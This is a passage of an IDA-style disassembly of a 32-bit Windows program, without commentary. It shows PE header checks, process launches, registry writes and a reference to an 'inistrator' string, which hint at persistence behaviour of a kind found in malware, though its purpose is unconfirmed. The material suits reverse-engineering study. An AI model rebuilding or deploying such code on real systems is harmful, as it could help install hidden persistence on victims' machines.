cmp [ebp+var_10], 1
jnz short loc_409B7F
push [ebp+var_C]
call sub_40A1EE
push [ebp+var_8]
call sub_40A218
mov [ebp+var_10], 0
loc_409B7F: ; CODE XREF: sub_4099E5+17B�j
; sub_4099E5+181�j
jmp short loc_409B36
sub_4099E5 endp
; ---------------------------------------------------------------------------
db 5Bh, 5Eh, 5Fh
dd 4C2C9h, 24A48Dh, 90000000h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push edi
push esi
push ebx
mov esi, [ebp+10h]
mov edi, [ebp+0Ch]
mov dword_41B79E, edi
add ebp, 4
mov ebx, 0FFFFFFFFh
push 400h
push edi
call sub_40A1BE
or eax, eax
jnz short loc_409BD9
cmp word ptr [edi], 5A4Dh
jnz short loc_409BD9
add edi, [edi+3Ch]
cmp dword ptr [edi], 4550h
jnz short loc_409BD9
movzx ecx, word ptr [edi+16h]
test ecx, 2000h
jz short loc_409BD9
xor ebx, ebx
loc_409BD9: ; CODE XREF: rdata:00409BB7�j
; rdata:00409BBE�j ...
or ebx, ebx
jnz short loc_409BFA
call sub_403D20
cmp esi, 1
jnz short loc_409BF3
mov eax, 1
pop ebx
pop esi
pop edi
leave
retn 0Ch
; ---------------------------------------------------------------------------
loc_409BF3: ; CODE XREF: rdata:00409BE5�j
pop ebx
pop esi
pop edi
leave
retn 0Ch
; ---------------------------------------------------------------------------
loc_409BFA: ; CODE XREF: rdata:00409BDB�j
sub ebp, 4
pop ebx
pop esi
pop edi
leave
retn 0Ch
; ---------------------------------------------------------------------------
dd 24A48Dh, 5000000h, 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409C10 proc near ; CODE XREF: sub_4099E5+22�p
var_190 = byte ptr -190h
var_180 = byte ptr -180h
var_12C = byte ptr -12Ch
var_54 = dword ptr -54h
var_10 = byte ptr -10h
push ebp
mov ebp, esp
add esp, 0FFFFFE80h
push edi
push esi
push ebx
push 0
call sub_40A284
push offset aInistrator ; "inistrator"
call sub_40F550
mov dword_41BB68, eax
push offset dword_41BB6C
push 1
push 4
push dword_41BB68
push offset word_41B7AA
call sub_40A28A
push 12Ch
lea eax, [ebp+var_180]
push eax
push 0
call sub_40A188
xor eax, eax
lea edi, [ebp+var_54]
mov ecx, 44h
rep stosb
mov [ebp+var_54], 44h
xor edx, edx
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_54]
push eax
push edx
push edx
push edx
push edx
push edx
push edx
lea eax, [ebp+var_180]
push eax
push edx
call sub_40A122
push 0
call sub_40A13A
lea esp, [esp+0]
lea esp, [esp+0]
push ebp
mov ebp, esp
add esp, 0FFFFFE70h
push edi
push esi
push ebx
push 0
push 64h
lea eax, [ebp+var_190]
push eax
call sub_40A3A4
push 0
push 12Ch
lea eax, [ebp+var_12C]
push eax
call sub_40A3A4
push 12Ch
lea eax, [ebp+var_12C]
push eax
push 0
call sub_40A188
mov edx, 64h
lea ecx, [ebp+var_12C]
lea eax, word_41B7AA
push eax
call sub_40AF60
push offset word_41B7DA
push offset loc_414557
push offset word_41B7AA
call sub_4048E0
lea eax, [ebp+var_190]
push eax
call sub_404B00
lea eax, [ebp+var_190]
push eax
push offset loc_414537
push offset word_41B7DA
push 80000000h
call sub_404870
lea eax, [ebp+var_12C]
push eax
push offset loc_414540
push offset word_41B7DA
push 80000000h
call sub_404870
pop ebx
pop esi
pop edi
leave
retn
sub_409C10 endp
; ---------------------------------------------------------------------------
dd 24A48Dh, 5000000h, 0
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
add esp, 0FFFFFD44h
push edi
push esi
push ebx
xor ebx, ebx
push 1F4h
call sub_40A212
lea eax, [ebp-2BCh]
push eax
push offset dword_4147A4
call sub_403400
cmp eax, 1
jnz short loc_409D9B
lea eax, [ebp-2BCh]
push eax
call sub_40A12E
inc ebx
loc_409D9B: ; CODE XREF: rdata:00409D8C�j
mov eax, ebx
pop ebx
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
dw 0A48Dh
dd 24h, 24A48D00h, 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409DB0 proc near ; CODE XREF: rdata:004046C4�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
add esp, 0FFFFFFFCh
push 0
push 80h
push 3
push 0
push 1
push 80000000h
push [ebp+arg_0]
call sub_40A110
mov [ebp+var_4], eax
cmp eax, 0FFFFFFFFh
jz short loc_409E19
push 0
push [ebp+var_4]
call sub_40A176
mov ebx, eax
push ebx
call sub_40A290
or eax, eax
jz short loc_409E19
mov edi, eax
or eax, eax
jz short loc_409E19
mov ecx, [ebp+arg_4]
mov [ecx], edi
push 0
push esp
push ebx
push edi
push [ebp+var_4]
call sub_40A1E8
push [ebp+var_4]
call sub_40A0FE
mov ecx, [ebp+arg_8]
mov [ecx], ebx
xor eax, eax
leave
retn 0Ch
; ---------------------------------------------------------------------------
loc_409E19: ; CODE XREF: sub_409DB0+26�j
; sub_409DB0+3C�j ...
mov eax, 0FFFFFFFFh
leave
retn 0Ch
sub_409DB0 endp
; ---------------------------------------------------------------------------
dw 0A48Dh
dd 24h, 24A48D00h, 0
dd 68535657h, 258h, 41B10A68h, 0E8006A00h, 344h, 0BCB805C7h
dd 41h, 3B680000h, 0E800414Ah, 372h, 0F60BF08Bh, 44685A74h
dd 5600414Ah, 32BE8h, 74C00B00h, 0BCA8A34Bh, 53680041h
dd 5600414Ah, 317E8h, 74C00B00h, 0BCACA337h, 60680041h
dd 5600414Ah, 303E8h, 74C00B00h, 0BCB0A323h, 71680041h
dd 5600414Ah, 2EFE8h, 74C00B00h, 0BCB4A30Fh, 5C70041h
dd 41BCB8h, 1, 41AE9668h, 2EAE800h, 7E680000h, 0E80041AEh
dd 2E0h, 0C35F5E5Bh
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409ED0 proc near ; CODE XREF: sub_4099E5+9�p
var_6A4 = byte ptr -6A4h
var_514 = byte ptr -514h
var_384 = byte ptr -384h
var_258 = byte ptr -258h
push ebp
mov ebp, esp
add esp, 0FFFFF95Ch
push edi
push esi
push ebx
push 12Ch
lea eax, [ebp+var_384]
push eax
push 0
call sub_40A188
lea edx, [ebp+var_384]
dec eax
cmp byte ptr [eax+edx-4], 5Ch
jnz loc_409FBC
push 258h
lea eax, [ebp+var_258]
push eax
call sub_40A19A
lea edx, [ebp+var_258]
cmp byte ptr [eax+edx-1], 5Ch
jz short loc_409F25
mov word ptr [eax+edx], 5Ch
loc_409F25: ; CODE XREF: sub_409ED0+4D�j
push (offset loc_414501+1)
lea eax, [ebp+var_258]
push eax
call sub_40A248
push 0
lea eax, [ebp+var_258]
push eax
lea eax, [ebp+var_384]
push eax
call sub_40A104
lea eax, [ebp+var_258]
push eax
lea eax, [ebp+var_514]
push eax
call sub_40A25A
lea eax, [ebp+var_258]
push eax
lea eax, [ebp+var_6A4]
push eax
call sub_40A25A
push offset loc_414714
lea eax, [ebp+var_514]
push eax
call sub_40A248
push offset loc_41470D
lea eax, [ebp+var_6A4]
push eax
call sub_40A248
lea eax, [ebp+var_514]
push eax
call sub_409FD0
push 7D0h
call sub_40A212
lea eax, [ebp+var_6A4]
push eax
call sub_409FD0
push 0
call sub_40A13A
loc_409FBC: ; CODE XREF: sub_409ED0+2B�j
pop ebx
pop esi
pop edi
leave
retn
sub_409ED0 endp
; ---------------------------------------------------------------------------
db 8Dh, 0A4h, 24h
align 8
dd 24A48Dh, 90000000h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409FD0 proc near ; CODE XREF: sub_409ED0+CA�p
; sub_409ED0+E0�p
var_54 = dword ptr -54h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFFFACh
push edi
push esi
push ebx
xor eax, eax
lea edi, [ebp+var_54]
mov ecx, 44h
rep stosb
mov [ebp+var_54], 44h
xor edx, edx
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_54]
push eax
push edx
push edx
push edx
push edx
push edx
push edx
push [ebp+arg_0]
push edx
call sub_40A122
mov edi, eax
push [ebp+var_10]
call sub_40A0FE
push [ebp+var_C]
call sub_40A0FE
mov edi, eax
pop ebx
pop esi
pop edi
leave
retn 4
sub_409FD0 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
add esp, 0FFFFFBF8h
push ebx
push esi
push edi
mov dword ptr [ebp-408h], 0
mov ebx, [ebp+18h]
cmp ebx, 1
jg short loc_40A048
mov eax, 0FFFFFFFEh
jmp loc_40A0EA
; ---------------------------------------------------------------------------
loc_40A048: ; CODE XREF: rdata:0040A03C�j
mov esi, [ebp+0Ch]
add esi, [ebp+10h]
sub esi, ebx
mov edx, esi
mov ecx, 100h
mov eax, ebx
lea edi, [ebp-404h]
rep stosd
mov ecx, ebx
dec ecx
mov esi, [ebp+14h]
lea edi, [ebp-404h]
xor eax, eax
loc_40A06F: ; CODE XREF: rdata:0040A076�j
mov al, [esi]
inc esi
mov [edi+eax*4], ecx
dec ecx
jnz short loc_40A06F
mov ecx, ebx
dec ecx
mov [ebp-4], ecx
mov esi, [ebp+0Ch]
mov edi, [ebp+14h]
add esi, [ebp+8]
jmp short loc_40A09E
; ---------------------------------------------------------------------------
loc_40A089: ; CODE XREF: rdata:0040A0DC�j
add eax, ecx
sub eax, [ebp-4]
jns short loc_40A095
mov eax, 1
loc_40A095: ; CODE XREF: rdata:0040A08E�j
; rdata:0040A0B1�j
add esi, eax
mov ecx, [ebp-4]
loc_40A09A: ; CODE XREF: rdata:0040A0B7�j
; rdata:0040A0E2�j
cmp edx, esi
jl short loc_40A0E4
loc_40A09E: ; CODE XREF: rdata:0040A087�j
; rdata:0040A0D1�j
xor eax, eax
mov al, [ecx+esi]
cmp al, [ecx+edi]
jz short loc_40A0B9
mov eax, [ebp+eax*4-404h]
cmp ebx, eax
jnz short loc_40A095
lea esi, [ecx+esi+1]
jmp short loc_40A09A
; ---------------------------------------------------------------------------
loc_40A0B9: ; CODE XREF: rdata:0040A0A6�j
dec ecx
xor eax, eax
loc_40A0BC: ; CODE XREF: rdata:0040A0C5�j
mov al, [ecx+esi]
cmp al, [ecx+edi]
jnz short loc_40A0D3
dec ecx
jns short loc_40A0BC
inc dword ptr [ebp-408h]
mov ecx, [ebp-4]
inc esi
jmp short loc_40A09E
; ---------------------------------------------------------------------------
loc_40A0D3: ; CODE XREF: rdata:0040A0C2�j
mov eax, [ebp+eax*4-404h]
cmp ebx, eax
jnz short loc_40A089
lea esi, [ecx+esi+1]
jmp short loc_40A09A
; ---------------------------------------------------------------------------
loc_40A0E4: ; CODE XREF: rdata:0040A09C�j
mov eax, [ebp-408h]
loc_40A0EA: ; CODE XREF: rdata:0040A043�j
pop edi
pop esi
pop ebx
leave
retn 14h
; ---------------------------------------------------------------------------
db 0CCh
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A0F2 proc near ; CODE XREF: rdata:004035B2�p
; sub_403D90+85�p ...
jmp ds:dword_41318C
sub_40A0F2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A0F8 proc near ; CODE XREF: rdata:004043B5�p
; sub_404500+8F�p ...
jmp ds:dword_413188
sub_40A0F8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A0FE proc near ; CODE XREF: sub_403B90+AE�p
; sub_403D90+32�p ...
jmp ds:dword_413108
sub_40A0FE endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A104 proc near ; CODE XREF: sub_409ED0+76�p
jmp ds:dword_413104
sub_40A104 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A10A proc near ; CODE XREF: sub_4099E5+69�p
jmp ds:dword_413134
sub_40A10A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A110 proc near ; CODE XREF: sub_403EB0+1E�p
; sub_403F60+23�p ...
jmp ds:dword_413130
sub_40A110 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A116 proc near ; CODE XREF: sub_404250+33�p
jmp ds:dword_41312C
sub_40A116 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A11C proc near ; CODE XREF: sub_403D90+15�p
; sub_4099E5+30�p ...
jmp ds:dword_413128
sub_40A11C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A122 proc near ; CODE XREF: sub_403F10+2E�p
; sub_409C10+79�p ...
jmp ds:dword_413124
sub_40A122 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A128 proc near ; CODE XREF: rdata:004044B1�p
; sub_404500+E2�p ...
jmp ds:dword_413120
sub_40A128 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A12E proc near ; CODE XREF: rdata:00409D95�p
jmp ds:dword_41311C
sub_40A12E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A134 proc near ; CODE XREF: rdata:00404641�p
; sub_408440+11�p ...
jmp ds:dword_413118
sub_40A134 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A13A proc near ; CODE XREF: sub_4099E5+50�p
; sub_4099E5+114�p ...
jmp ds:dword_413114
sub_40A13A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A140 proc near ; CODE XREF: rdata:004056BE�p
jmp ds:dword_413110
sub_40A140 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A146 proc near ; CODE XREF: sub_404500+116�p
jmp ds:dword_41310C
sub_40A146 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A14C proc near ; CODE XREF: sub_404500+40�p
jmp ds:dword_4130A8
sub_40A14C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A152 proc near ; CODE XREF: sub_404500+108�p
jmp ds:dword_4130EC
sub_40A152 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A158 proc near ; CODE XREF: sub_404250+86�p
jmp ds:dword_4130A0
sub_40A158 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A15E proc near ; CODE XREF: rdata:004034CC�p
jmp ds:dword_4130AC
sub_40A15E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A164 proc near ; CODE XREF: sub_403B90+6F�p
jmp ds:dword_41305C
sub_40A164 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A16A proc near ; CODE XREF: sub_411800+46�p
jmp ds:dword_413050
sub_40A16A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A170 proc near ; CODE XREF: rdata:0040446C�p
jmp ds:dword_413054
sub_40A170 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A176 proc near ; CODE XREF: sub_403F60+35�p
; sub_404250+52�p ...
jmp ds:dword_413058
sub_40A176 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A17C proc near ; CODE XREF: rdata:0040366F�p
; rdata:00403704�p ...
jmp ds:dword_413060
sub_40A17C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A182 proc near ; CODE XREF: rdata:0040445E�p
jmp ds:dword_413064
sub_40A182 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A188 proc near ; CODE XREF: rdata:00403596�p
; rdata:00403A5B�p ...
jmp ds:dword_413068
sub_40A188 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A18E proc near ; CODE XREF: sub_403B20+17�p
; sub_403B90+E�p ...
jmp ds:dword_41306C
sub_40A18E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A194 proc near ; CODE XREF: sub_403B20+38�p
; sub_403B90+1B�p ...
jmp ds:dword_413070
sub_40A194 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A19A proc near ; CODE XREF: sub_403D90+5A�p
; sub_4041A0+22�p ...
jmp ds:dword_413074
sub_40A19A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A1A0 proc near ; CODE XREF: rdata:0040531E�p
; sub_4109E0+3�p
jmp ds:dword_413078
sub_40A1A0 endp
; ---------------------------------------------------------------------------
dw 25FFh
dd offset dword_41307C
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A1AC proc near ; CODE XREF: sub_41274B+17�p
jmp ds:dword_413080
sub_40A1AC endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A1B2 proc near ; CODE XREF: rdata:00405697�p
; sub_408440+3C4�p ...
jmp ds:dword_413084
sub_40A1B2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A1B8 proc near ; CODE XREF: rdata:00405375�p
; rdata:0040549C�p ...
jmp ds:dword_413088
sub_40A1B8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A1BE proc near ; CODE XREF: rdata:00409BB0�p
; sub_412230+F�p
jmp ds:dword_41308C
sub_40A1BE endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A1C4 proc near ; CODE XREF: rdata:00404662�p
; sub_408440+39�p ...
jmp ds:dword_413090
sub_40A1C4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A1CA proc near ; CODE XREF: sub_403D20+58�p
jmp ds:dword_413094
sub_40A1CA endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A1D0 proc near ; CODE XREF: sub_4080A0+10�p
; sub_408140+10�p ...
jmp ds:dword_413098
sub_40A1D0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A1D6 proc near ; CODE XREF: sub_409610+BA�p
; sub_411CE0+6�p ...
jmp ds:dword_41309C
sub_40A1D6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A1DC proc near ; CODE XREF: sub_403FF0+32�p
; sub_404250+46�p ...
jmp ds:dword_41313C
sub_40A1DC endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A1E2 proc near ; CODE XREF: sub_403FF0+15�p
; sub_404CC5+19�p ...
jmp ds:dword_413140
sub_40A1E2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A1E8 proc near ; CODE XREF: sub_403F60+67�p
; sub_405100+5E�p ...
jmp ds:dword_413138
sub_40A1E8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A1EE proc near ; CODE XREF: rdata:004053B4�p
; sub_4099E5+167�p ...
jmp ds:dword_4130A4
sub_40A1EE endp
; ---------------------------------------------------------------------------
dd 30B025FFh
db 41h, 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A1FA proc near ; CODE XREF: rdata:loc_403952�p
jmp ds:dword_4130B4
sub_40A1FA endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A200 proc near ; CODE XREF: rdata:00404670�p
jmp ds:dword_4130B8
sub_40A200 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A206 proc near ; CODE XREF: sub_403EB0+34�p
; sub_404940+34�p ...
jmp ds:dword_4130BC
sub_40A206 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A20C proc near ; CODE XREF: rdata:004044C4�p
; sub_404500+EF�p
jmp ds:dword_4130C0
sub_40A20C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A212 proc near ; CODE XREF: rdata:00403772�p
; rdata:004037A3�p ...
jmp ds:dword_4130C4
sub_40A212 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A218 proc near ; CODE XREF: sub_4099E5+16F�p
; sub_4099E5+18E�p
jmp ds:dword_4130C8
sub_40A218 endp
; ---------------------------------------------------------------------------
dw 25FFh
dd offset dword_4130CC
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A224 proc near ; CODE XREF: sub_404250+8E�p
; sub_404CC5+CE�p
jmp ds:dword_4130D0
sub_40A224 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A22A proc near ; CODE XREF: sub_403F60+49�p
; sub_403FF0+59�p ...
jmp ds:dword_4130D4
sub_40A22A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A230 proc near ; CODE XREF: sub_403D90+FB�p
; sub_403FF0+12C�p ...
jmp ds:dword_4130D8
sub_40A230 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A236 proc near ; CODE XREF: rdata:004044D1�p
; sub_404500+F9�p ...
jmp ds:dword_4130DC
sub_40A236 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A23C proc near ; CODE XREF: rdata:00403506�p
; sub_407B46+392�p ...
jmp ds:dword_4130E0
sub_40A23C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A242 proc near ; CODE XREF: sub_403EB0+45�p
; sub_404940+45�p ...
jmp ds:dword_4130E4
sub_40A242 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A248 proc near ; CODE XREF: rdata:00403A70�p
; rdata:00404751�p ...
jmp ds:dword_4130E8
sub_40A248 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A24E proc near ; CODE XREF: sub_404820+44�p
; sub_4082A0+23�p
jmp ds:dword_413144
sub_40A24E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A254 proc near ; CODE XREF: sub_403400+49�p
; rdata:0040354B�p ...
jmp ds:dword_4130F0
sub_40A254 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A25A proc near ; CODE XREF: sub_403400+5F�p
; rdata:00403514�p ...
jmp ds:dword_4130F4
sub_40A25A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A260 proc near ; CODE XREF: sub_403400+3A�p
; rdata:00404740�p ...
jmp ds:dword_4130F8
sub_40A260 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A266 proc near ; CODE XREF: sub_403400+11�p
; sub_403FF0+EC�p ...
jmp ds:dword_4130FC
sub_40A266 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A26C proc near ; CODE XREF: sub_408140+42�p
; rdata:00411E0C�p ...
jmp ds:dword_413100
sub_40A26C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A272 proc near ; CODE XREF: rdata:004043D0�p
jmp ds:dword_413000
sub_40A272 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A278 proc near ; CODE XREF: sub_404250+77�p
jmp ds:dword_413048
sub_40A278 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A27E proc near ; CODE XREF: sub_4041A0+41�p
; sub_404B00+19�p ...
jmp ds:dword_413164
sub_40A27E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A284 proc near ; CODE XREF: sub_409C10+E�p
jmp ds:dword_413160
sub_40A284 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A28A proc near ; CODE XREF: sub_409C10+36�p
jmp ds:dword_41316C
sub_40A28A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A290 proc near ; CODE XREF: rdata:00404478�p
; sub_404500+E�p ...
jmp ds:dword_41315C
sub_40A290 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A296 proc near ; CODE XREF: sub_404500+11C�p
; rdata:00404658�p ...
jmp ds:dword_413158
sub_40A296 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A29C proc near ; CODE XREF: rdata:004034D9�p
jmp ds:dword_413174
sub_40A29C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A2A2 proc near ; CODE XREF: sub_405260+18�p
jmp ds:dword_41301C
sub_40A2A2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A2A8 proc near ; CODE XREF: sub_405260+28�p
jmp ds:dword_413018
sub_40A2A8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A2AE proc near ; CODE XREF: sub_405260+32�p
jmp ds:dword_413040
sub_40A2AE endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A2B4 proc near ; CODE XREF: rdata:00403AB9�p
; rdata:00403B07�p ...
jmp ds:dword_413010
sub_40A2B4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A2BA proc near ; CODE XREF: rdata:00403A86�p
; sub_404870+30�p
jmp ds:dword_413014
sub_40A2BA endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A2C0 proc near ; CODE XREF: rdata:00403AFA�p
jmp ds:dword_413020
sub_40A2C0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A2C6 proc near ; CODE XREF: rdata:0040434C�p
jmp ds:dword_413024
sub_40A2C6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A2CC proc near ; CODE XREF: rdata:00403AE9�p
; rdata:00404383�p ...
jmp ds:dword_413028
sub_40A2CC endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A2D2 proc near ; CODE XREF: rdata:00404321�p
jmp ds:dword_41302C
sub_40A2D2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A2D8 proc near ; CODE XREF: rdata:004043A5�p
jmp ds:dword_413030
sub_40A2D8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A2DE proc near ; CODE XREF: rdata:00404411�p
jmp ds:dword_413034
sub_40A2DE endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A2E4 proc near ; CODE XREF: rdata:00403AA9�p
; sub_404870+52�p ...
jmp ds:dword_413038
sub_40A2E4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A2EA proc near ; CODE XREF: sub_403970+5F�p
jmp ds:dword_41303C
sub_40A2EA endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A2F0 proc near ; CODE XREF: rdata:00404C3D�p
; rdata:00405521�p ...
jmp ds:dword_4131C4
sub_40A2F0 endp
; ---------------------------------------------------------------------------
dw 25FFh
dd offset dword_4131C0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A2FC proc near ; CODE XREF: rdata:00404C80�p
; rdata:0040557F�p ...
jmp ds:dword_4131BC
sub_40A2FC endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A302 proc near ; CODE XREF: rdata:00404C33�p
; rdata:00405517�p ...
jmp ds:dword_4131B8
sub_40A302 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A308 proc near ; CODE XREF: rdata:00404BCE�p
; sub_408C10+12�p ...
jmp ds:dword_4131B4
sub_40A308 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A30E proc near ; CODE XREF: sub_409610+96�p
; sub_4096E0+48�p ...
jmp ds:dword_4131B0
sub_40A30E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A314 proc near ; CODE XREF: rdata:00404C21�p
; rdata:00405505�p ...
jmp ds:dword_4131A8
sub_40A314 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A31A proc near ; CODE XREF: sub_408C10+27�p
; rdata:0040A45B�p ...
jmp ds:dword_4131A0
sub_40A31A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A320 proc near ; CODE XREF: sub_407B46+19�p
; sub_408440+22�p ...
jmp ds:dword_4131D0
sub_40A320 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A326 proc near ; CODE XREF: rdata:00404C0E�p
; rdata:004054CB�p ...
jmp ds:dword_41319C
sub_40A326 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A32C proc near ; CODE XREF: sub_4096E0+FF�p
; rdata:0040A62A�p ...
jmp ds:dword_413194
sub_40A32C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A332 proc near ; CODE XREF: rdata:00404C6B�p
; rdata:00405556�p ...
jmp ds:dword_413198
sub_40A332 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A338 proc near ; CODE XREF: sub_408C10+14B�p
; sub_4096E0+99�p ...
jmp ds:dword_4131A4
sub_40A338 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A33E proc near ; CODE XREF: rdata:004054EF�p
; rdata:004055E7�p ...
jmp ds:dword_4131C8
sub_40A33E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A344 proc near ; CODE XREF: sub_408C10+199�p
; sub_4114E0+2EC�p
jmp ds:dword_4131CC
sub_40A344 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A34A proc near ; CODE XREF: rdata:00404BEA�p
; rdata:004054A7�p ...
jmp ds:dword_4131AC
sub_40A34A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A350 proc near ; CODE XREF: sub_40AD10+45�p
var_100 = byte ptr -100h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
add esp, 0FFFFFF00h
push edi
push esi
push ebx
push 0
push 100h
lea eax, [ebp+var_100]
push eax
call sub_40A3A4
push [ebp+arg_0]
lea eax, [ebp+var_100]
push eax
call sub_40A25A
mov edx, 64h
lea ecx, [ebp+var_100]
mov eax, [ebp+arg_4]
lea eax, [eax+51h]
push eax
call sub_40AF60
mov ecx, [ebp+arg_4]
call sub_40C140
pop ebx
pop esi
pop edi
leave
retn 8
sub_40A350 endp
; =============== S U B R O U T I N E =======================================
